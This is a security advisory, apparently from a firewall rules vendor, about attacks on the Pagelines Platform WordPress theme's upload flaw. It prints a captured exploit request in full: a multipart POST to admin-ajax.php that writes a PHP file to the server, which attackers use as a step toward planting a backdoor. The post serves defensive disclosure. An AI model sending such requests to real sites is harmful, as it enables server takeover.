Over the last few days we have seen a large number of attacks against this old Pagelines WordPress theme vulnerability. Sucuri discovered and published the Pagelines vulnerability in January 2015.
Technical Details
Any website running a vulnerable version of the Platform theme (<1.4.4) is at risk of privilege escalation and remote code execution. The captured request below exercises the theme's pagelines_test_ajax handler, reached through wp-admin/admin-ajax.php, and uses its "settings" upload to write a file named settings.php containing PHP to the server; the handler did not properly check the caller's privileges before accepting the upload.
ModSecurity audit log, request headers:
[27/May/2017:02:32:09 +0300] WSi6@VQikyQAAErqcawAAAAg 93.170.77.90 37930 127.0.0.1 80
--5367c063-B--
POST /wp-admin/admin-ajax.php HTTP/1.1
User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Connection: close, Te
Accept: */*
Te: trailers
Accept-language: en-US;q=0.8,en;q=0.6
Accept-encoding: gzip, deflate
Content-length: 398
Host: vsdysleksia.net
Content-type: multipart/form-data; boundary=xYzZY
Referer: https://malware.expert/
Request body (section C of the audit log). Note that the uploaded settings.php only echoes a fixed marker string: a scanner then requests the file and looks for that string in the response to confirm the upload executed before dropping a real backdoor.
--5367c063-C--
--xYzZY
Content-Disposition: form-data; name="page"

pagelines
--xYzZY
Content-Disposition: form-data; name="file"; filename="settings.php"
Content-Type: text/plain

<?php echo '0ba4439ee9a46d9d9f14c60f88f45f87'; exit; ?>
--xYzZY
Content-Disposition: form-data; name="action"

pagelines_test_ajax
--xYzZY
Content-Disposition: form-data; name="settings_upload"

settings
--xYzZY--
Final words
Websites using the Malware Expert ModSecurity rules are protected against this attack. The rules are a mitigation, not a fix: sites still running a vulnerable theme version should update it.